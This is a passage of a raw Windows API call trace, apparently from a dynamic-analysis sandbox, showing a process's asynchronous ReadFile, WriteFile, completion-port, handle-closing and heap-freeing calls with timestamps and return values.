lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.970] WriteFile (in: hFile=0x1e0, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020) returned 1 [0155.970] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.970] WriteFile (in: hFile=0x1c8, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x37e0020) returned 1 [0155.970] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.970] WriteFile (in: hFile=0x1a0, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020) returned 1 [0155.970] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.970] CloseHandle (hObject=0x1a8) returned 1 [0155.977] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0155.980] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.980] CloseHandle (hObject=0x1d8) returned 1 [0155.995] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0155.997] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.320] WriteFile (in: hFile=0x1c0, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x155bf, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020) returned 1 [0156.327] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.327] ReadFile (in: hFile=0x1a4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0156.327] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.327] ReadFile (in: hFile=0x1a0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0156.327] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.327] ReadFile (in: hFile=0x1d0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0156.328] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.328] WriteFile (in: hFile=0x1f0, lpBuffer=0x3a20124*, nNumberOfBytesToWrite=0x13f1d, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3a20020) returned 1 [0156.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.348] WriteFile (in: hFile=0x1c0, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020) returned 1 [0156.354] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0156.354] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0156.354] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.354] CloseHandle (hObject=0x1a0) returned 1 [0156.369] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0156.372] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.372] WriteFile (in: hFile=0x1f0, lpBuffer=0x3a20094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3a20020) returned 1 [0156.378] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.378] CloseHandle (hObject=0x1a8) returned 1 [0156.425] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0156.428] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.515] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x126d5, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020) returned 1 [0156.519] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.519] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0156.519] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0156.519] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.519] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.519] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020) returned 1 [0156.521] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.521] CloseHandle (hObject=0x1b8) returned 1 [0156.542] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0156.544] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.633] ReadFile (in: hFile=0x1b8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0156.633] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.633] ReadFile (in: hFile=0x1d0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 1 [0156.633] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.634] WriteFile (in: hFile=0x1b8, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x11235, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0156.643] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.643] ReadFile (in: hFile=0x1b8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0156.643] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0156.644] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.644] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.644] WriteFile (in: hFile=0x1b8, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0156.665] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0156.665] CloseHandle (hObject=0x1b8) returned 1 [0156.671] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0156.673] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0157.490] WriteFile (in: hFile=0x198, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x14cd0, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0157.526] ReadFile (in: hFile=0x198, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0157.526] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0157.526] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0157.526] WriteFile (in: hFile=0x198, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0157.532] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0157.532] CloseHandle (hObject=0x198) returned 1 [0157.550] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0157.553] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.120] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3510020) returned 1 [0158.121] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.678] ReadFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0158.678] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.679] ReadFile (in: hFile=0x1cc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 1 [0158.679] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.679] ReadFile (in: hFile=0x1c, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3630020) returned 1 [0158.680] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.680] ReadFile (in: hFile=0x1e0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3750020) returned 1 [0158.680] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.680] ReadFile (in: hFile=0x1d4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3870020) returned 1 [0158.684] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.684] ReadFile (in: hFile=0x1a8, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3990020) returned 1 [0158.685] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.685] ReadFile (in: hFile=0x1f0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2b70020) returned 1 [0158.686] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.686] WriteFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 0x0 [0158.716] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.716] WriteFile (in: hFile=0x1c, lpBuffer=0x3630124, nNumberOfBytesToWrite=0xec12, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3630020) returned 0x0 [0158.722] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.724] WriteFile (in: hFile=0x1f0, lpBuffer=0x2b70124, nNumberOfBytesToWrite=0x17c7d, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2b70020) returned 0x0 [0158.733] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.753] ReadFile (in: hFile=0x1a8, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3990020) returned 0x0 [0158.753] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0158.757] WriteFile (in: hFile=0x1c, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3630020) returned 1 [0158.782] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0158.784] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0158.784] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0159.430] WriteFile (in: hFile=0x1ac, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3750020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0159.435] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3510020) returned 1 [0159.440] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0159.441] CloseHandle (hObject=0x1b4) returned 1 [0159.451] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0159.454] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0159.455] CloseHandle (hObject=0x1f4) returned 1 [0159.475] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0159.477] 